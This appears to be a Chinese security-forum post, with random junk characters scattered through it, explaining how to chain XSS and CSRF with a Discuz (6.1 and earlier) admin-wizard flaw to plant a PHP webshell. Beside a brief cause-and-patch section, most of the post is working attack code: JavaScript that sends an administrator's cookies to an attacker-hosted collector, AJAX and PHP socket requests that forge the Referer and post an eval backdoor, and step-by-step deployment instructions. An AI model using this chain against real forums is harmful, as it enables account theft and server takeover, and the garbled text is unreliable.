Discuz XSS得webshell
3 b$ C3 l K; N v: W% o& B' IBy racle @tian6.com
Y$ \1 m! S* d; P( Y欢迎转帖.但请保留版权信息.5 U8 q/ c; k v2 R8 Y
受影响版本 iscuz<=6.1.0,gbk+utf+big5( h7 w; ~7 V) P& P! M
( f: t5 c9 ]( ~3 V* A2 e新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效./ O1 `$ C8 v$ A9 ^8 P2 s
" ]) m S" ], O( j }7 [1 X- \7 ~
2 N6 F1 R3 b5 A; N* y" ?; u: n3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
$ Q! b' @# v8 F4 j当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.5 _- ?, E I$ w" P
, r6 Z& d! S& C7 S1 D5 e
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
$ J) s9 K; c" |' f, s8 d本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS+ _% \0 A3 x) Q/ M5 G
; g* D8 J" v+ m6 s' s) I' K1 G
6 `0 W& O/ r& K----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
1 L5 ~' G+ @% y- a9 Q, P
* ?+ {5 T! u2 O H7 ]) B$ o5 \. k. F( S& j) z3 L d% P1 X
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
, U* f0 M% |' k9 ^3 O4 V2 y
% m* I1 f1 A6 V( B& \- i% iproblem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
+ M2 x4 D0 E' w$ T& A: B! b: K: \/ R* t! |
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
+ S7 V1 {# _. a; v7 J; y- w8 D; z
- i$ D5 E8 P4 ~1 A6 t# l* T' W% P' @/ v% ?8 W2 U3 V" J
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {6 C& _( @$ O9 P" s& x+ m
) ^, M5 {( D4 _8 y1 z global $runwizardfile, $runwizardhistory;) [$ K p5 w9 d5 Z: \# w3 s$ u
9 q [. i" \' v5 s4 c0 E, [ $fp = fopen($runwizardfile, 'w');, J0 V+ W. D& Q( w2 ^
) E, z( I( e/ V1 z fwrite($fp, serialize($runwizardhistory));* r& j5 |7 a+ N. ~
0 r5 g1 {6 X: i
fclose($fp);9 O+ }1 J3 W) V3 K% p9 [, N3 d
$ W$ R" Q# L$ \0 F2 [( x% Q
}# b7 j8 m$ w/ q2 g1 |$ z( y
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里., n u8 ~6 J1 D; Q
以下是修补的办法:function saverunwizardhistory() {( x/ n3 J: J! F
0 Y' b2 K' w/ ?$ {" W
global $runwizardfile, $runwizardhistory;
& y2 j5 u3 u p! b) w8 x
8 Q5 u. U+ n8 V4 S2 Z( `* @ $fp = fopen($runwizardfile, 'w');
: e2 g0 d& R9 e# P, d' p; U4 t% ^
1 G& ]& U& W4 e $s = '<?php exit;?>';) h1 A: q( d% v7 J
' k `- _" ]* W5 v' @, A% T $s .= serialize($runwizardhistory);/ O7 c; Y1 _/ ~+ t7 A
1 X& h) m! Y: ~" Z4 i1 I fwrite($fp, $s);
Q# \0 E0 K/ o. A4 N) I+ T$ T# T( s0 _; ^* i' q
fclose($fp);- s! ~2 e4 E, Z) l3 l$ J
+ [6 {- C- V( u0 D: C}
- |# w7 c4 F8 ^6 }复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
4 Y. |$ O2 t; E& l. U; b, p" B! h- Z6 t
$ R1 o' N3 t" A3 c: ]
% S- f8 \8 j7 y" K) o2 B----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------3 n! s# D# E- c" c$ o
7 E% k. F% F# P7 r* Q
9 ~( S5 u+ C! s% ? 以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
% s3 X% O4 N+ @2 @' c7 ~+ J, Y3 S
8 j! Y- R- m) _- f5 }( C/ X我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.3 q8 {% R' g* S) d" P/ _0 t$ _
9 f b( C5 F0 e% k# s/ h
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
0 r! ?. u" B) L" ^
# A' G* t p+ ^3 q; K首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:/ _: U N6 j9 p6 T+ M
9 F: y2 L A) e
var url="http://目标网站/admincp.php"; ; U) a! j0 {# f% o
9 r8 k, K$ ?* A. _
/*获得cookies*/8 }) X+ P O9 L; u) X. W5 ^5 I6 s* ^
4 \) v) I9 I+ U4 j) F% V: u( P. Afunction getURL(s) {' C. n5 A- B' t4 K& y
. ?- H: G6 g, |4 \3 h+ \- Gvar image = new Image();
2 `: n" m( \+ T# r4 D
! ?# H+ r" A9 v6 [ O: R, ximage.style.width = 0;
: c7 e0 g3 P4 f! f- m, n2 k9 j
+ u n& J! y2 f: E; i9 iimage.style.height = 0;5 z9 h8 C2 V( u( P/ [
0 ^4 [1 Q7 O) ]
image.src = s;+ L& u' |# W/ h$ y
4 N4 B0 E( J4 g. I* B( K1 R* q}# O" U) i4 p0 _- H: J- O
7 ^& M- V$ c' v/ N8 VgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php
+ j1 d8 ]4 A3 C9 x) R# f, R9 L复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
. l; E2 g9 _5 _2 t* c6 |. b复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) # L( t* M' N# P' W- g2 f! T
" I. ?. B1 C, X2 ^
; v7 e; f4 l. M# [# I) ]% h5 g" Q获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
7 \; t M- q! B+ |2 k+ N4 p) M+ V
$ y' e' ?" [: U5 _
7 ~, s6 g4 ~% ?, s. i4 s% ?' ? M& q4 u) f# K# m
/*hash*/# s9 k% e' X ^2 E0 W1 W1 ~ d
" W% j+ N% c0 {2 \
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
' f/ w" k6 l) J+ n. ^# z% A
4 Y9 S, k6 F& |- k4 {. k9 B# cxmlHttpReq.open("GET", url+"admincp.php?action=home", false);$ Y) R& @' k& j6 _
5 F( N! F5 \ @' `xmlHttpReq.send();; y9 A& S c. d* ~
" }* G$ ?& J0 r' zvar resource = xmlHttpReq.responseText;
8 \' W& H! O3 L- K
- C/ Y1 ]. K/ a$ d8 S* C( Hvar numero = resource.search(/formhash/);
& n8 _; D6 H2 U5 s& d- R2 R
% e" L; F# Y/ }" R2 |var formhash=encodeURIComponent(resource.substr(numero+17,8));' M: o, i6 A% C6 Q# P
0 _) p4 ]: n8 Y- w; C6 ~% Z" D
9 h9 ]* l4 |% S2 O; q7 |" s* Q* s
# j Z0 X. }7 B4 N8 w
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
- r$ o& {$ I7 e3 t1 E# Q
: ^, W7 `. _- N# g3 `3 fxmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
( Q2 X* z9 N1 T5 i! l2 j a: \7 c+ Z9 R" B9 C! D
xmlHttpReq.setRequestHeader("Referer", url);
2 u4 ]# j7 e: w: ~6 L& q" H1 t( B1 X$ P( a, ]% y
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");8 o: }8 V/ Q- @2 W3 p4 K" R
: i$ e4 v, ~4 ]" v1 qxmlHttpReq.setrequestheader("content-length",post.length); 6 l1 J+ g$ J# u
7 b$ R9 F, M: i: y) V4 o, z. wxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
3 \& ~5 w/ D; \! G! i1 Q, P
$ q' J+ I2 ~* TxmlHttpReq.send(post);//发送数据0 i9 r% P% _ u; | J. Q* N
复制代码这里HASH我假设正确,这样提交,也无须cookies
. i1 V( Q2 O/ G# w- X! d- M K9 e! l
! \ }8 N! r( a再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);+ Q" V5 ?4 U7 v* g
4 X' [ I7 V1 o3 Uif (!$sock) die("$errstr ($errno)\n");2 ^- M" k, \3 H# a M2 F
/ a7 v: C/ M9 V1 b( _2 w* Q$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';/ C1 `0 I/ j! \9 j" f
6 z9 {6 G' |0 I$ Y9 W9 U- w0 w
+ C5 M' x& H8 K9 \/ L
; }3 m4 m& v5 }- p1 }fwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");( U& b' Y! ~5 n1 _ v$ R' h; w
5 E/ M5 N' L( S& y Y ?, h7 a$ T
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");+ v: t/ c! @4 w
2 A8 m- Z9 S T- n8 V; g: q. u
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
6 Q6 P9 E# Q1 w- D. @. t: M' ~: J0 b) w$ S6 ^
fwrite($sock, "Accept-Language: zh-cn\r\n");& K; {9 ~ i2 T8 \; Y( c
. S, u w- {/ Qfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
6 ]$ I2 B7 {' y$ e- p- ?4 X# K, h
3 a( z' Y* F* S3 {, s T) ^/ Sfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
' j% ]* }1 K6 F9 t# O! f
% I3 p/ t7 \+ ?fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");. N/ ^7 c) w3 M! x
- G$ x! k' ?7 c# G! l& ^7 [, mfwrite($sock, "Host: $url\r\n");
( O1 Q) N( q8 L2 }+ Q8 P$ E
6 Q8 d b) T0 I/ S: t1 j$ D" S- t2 hfwrite($sock, "Content-Length: ".strlen($data)."\r\n");
3 K& h4 s5 d: b; O$ U$ H8 y, y# F9 {, O( X. ]6 v9 p% j5 k
fwrite($sock, "Connection: Keep-Alive\r\n");
' O D+ D+ r2 c% `) D$ Z+ X% X9 L7 E
fwrite($sock, "Cache-Control: no-cache\r\n");
' |. n ]9 B1 G( e% G$ D) ~( E! W7 U+ J# v. U8 S! Y4 F9 H" P- H
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");. N2 E* t5 x2 T& b' i O
% T, ?! O$ e: W5 j% ?. J$ `7 }# M
fwrite($sock, $data);
# k0 V$ v; |2 ?. I( M/ ^3 o e( e
( v5 `% E, S* _* K" h
( l) `' I4 T5 _" ^$headers = "";
0 K6 {' O4 A# |% J9 R6 [: c; K
4 w( i% e* I& E! \while ($str = trim(fgets($sock, 4096)))0 u5 t" X- {3 x5 _7 t* B' ?
$ i: _9 _& w. M. `6 ` $headers .= "$str\n";
: G' _% u9 ^6 ~' R7 q. Y7 V$ c, ?% `2 k/ O- f) h
echo "\n";7 F0 N" E* o+ W2 e
0 e, V' g/ O' f! \9 D' T" T% T$body = "";
+ K/ q# v* Z. A" |$ m; H# U. O7 {# t" x8 v$ z5 M% N9 j% z
while (!feof($sock))+ f8 h- u8 Q2 H" @: J1 @2 R+ C
+ ]! T6 h# J* ^ $body .= fgets($sock, 4096);( s* @( |# t) ?8 T+ _; B
# m3 V. i9 ~* L1 ifclose($sock);
( O' i6 Q, _+ \( `0 S! f7 F" r, @; e& K
echo $body;
2 I( Y: M# G, O* U; Z0 s- y复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^/ o8 D* X4 x4 Z: e$ e" X
% N# M1 g# t* r6 `( o1 Q8 W s; c1 I! ]6 C1 x
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------6 J& ?' S6 Q/ c# g2 |& E
( R8 O: S* Q- g' y4 w' ?
3 Z7 T) G/ _8 _9 k
1 HP SOCKET利用方法首先打开racle.js& h8 ^; C4 w$ g( K" ^- ?0 }
: h& K, ^1 m3 ]; ]1 t5 Lvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
% X; g9 i/ o3 j! O; ]% H7 N( [( @; Z: Q/ J: a' e3 Q2 [
; c+ K# L' ?4 S$ h8 |' }
0 R& s. w$ _& w/ F- B然后打开racle@tian6.php
: A5 c8 u v) |% \6 A; m* s6 ]
; \, J. z- B" \- X/ K$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com
( ~, J% u- [% S- h, T& s
d. Z, H8 E4 i( ]6 d% o: [; j9 T' d4 d/ d/ P
* K1 m' O# {, q) G如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:& } c: i* ~' n9 `0 u" b$ x* L
) i; P7 u# o! V' \' ZgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
0 d- y" {. y1 C; ^7 |: g2 x! P. S/ q1 X9 b
为
; p$ `9 Y3 ?& Z# q( [+ J, B! I) J3 X G* Y J+ M
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));' S! `/ `5 q) p3 S
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
! f" i+ b- t2 k$ p6 l/ A6 { q' Z2 X8 p
3 [" ~" l6 J9 j' p
3 M. t- d5 W0 e) M如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:1 C# g" a8 v5 z: }& K3 K0 [
' l( y: Y$ b) w4 o# S& k% U% Q E2 qvar formhash=encodeURIComponent(resource.substr(numero+17,8));2 ~" B# q/ U) j: R
7 P* ], o8 J4 o6 P3 [; g为
; q) ~* R; Z" Q1 Q& P' Y) n! B
; h* @% [ ` U1 dvar formhash=encodeURIComponent(resource.substr(numero+9,8));' O# G3 h# l8 k
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧./ \ k( x% I; r% k/ Q7 [
" t8 J8 m* \. H4 ?4 f如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
, d! M3 O0 W, I9 Z
# l! c3 V. o& ^% L如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
; y8 b3 Z# g/ J/ h Y2 E6 d* v; G: z* J$ }8 B" o; f
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
6 _" u6 w* n0 ^% {% t3 S+ e- ? 6 q7 m: @9 I& F+ X j( x
|